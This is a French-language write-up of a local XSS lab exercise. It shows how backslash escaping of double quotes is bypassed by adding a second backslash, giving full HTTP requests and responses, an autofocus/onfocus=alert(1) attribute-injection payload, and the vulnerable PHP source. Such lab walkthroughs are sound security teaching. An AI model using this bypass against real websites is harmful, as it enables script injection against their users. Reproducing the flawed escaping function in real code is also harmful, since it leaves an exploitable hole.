Exploitation
Afin de protéger l'application, l'auteur indique qu'il échappe maintenant le caractère " :
Le caractère " subit effectivement un traitement, il s'agit d'un échappement par l'insertion du caractère \ :
Copier POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/
search=whatever%22&submit=Envoyer
Copier HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2100
Connection: close
Content-Type: text/html; charset=UTF-8
<div class="form-group col-md-2">
<input type="text" class="form-control" id="search" name="search" value="whatever\"" placeholder="keyword" required>
</div> Le contournement qui me parait le plus évident à tester est d'insérer également un caractère \ afin d'échapper l'échappement :
Copier POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/
search=whatever%5C%22&submit=Envoyer
Copier HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2101
Connection: close
Content-Type: text/html; charset=UTF-8
<div class="form-group col-md-2">
<input type="text" class="form-control" id="search" name="search" value="whatever\\"" placeholder="keyword" required>
</div> Cela semble fonctionner :
Il ne me reste plus qu'à adapter ma payload basée sur l'autofocus whatever\" onfocus=alert(1) autofocus x=\" (attention, j'enlève également les guillemets autour du code Javascript) :
Copier POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/
search=whatever%5C%22+onfocus%3Dalert%281%29+autofocus+x%3D%5C%22&submit=Envoyer
Copier HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2134
Connection: close
Content-Type: text/html; charset=UTF-8
<div class="form-group col-md-2">
<input type="text" class="form-control" id="search" name="search" value="whatever\\" onfocus=alert(1) autofocus x=\\"" placeholder="keyword" required>
</div> Analyse du code source
La fonction xss_check() effectue un traitement sur le caractère " qui se retrouve échappé par l'ajout d'un \ devant chaque occurrence. Le mot clé est ensuite affiché en tant que valeur de l'attribut HTML value :
Copier <?php
if (isset ($_POST['submit']) && isset ($_POST['search'])) {
$keyword = $_POST['search'];
}
function xss_check($data) {
$input = str_replace('"', '\"', $data);
$input = urldecode($input);
return $input;
}
?>
<div class="row">
<form name="forgetPass" method="post">
<div class="form-group col-md-2">
<input type="text" class="form-control" id="search" name="search" value="<?php if (isset ($keyword) && !empty ($keyword)){ echo xss_check($keyword); }?>" placeholder="keyword" required>
</div>
<div class="form-group col-md-2">
<input type="submit" class="form-control btn btn-default" name="submit">
</div>
</form>
</div> 
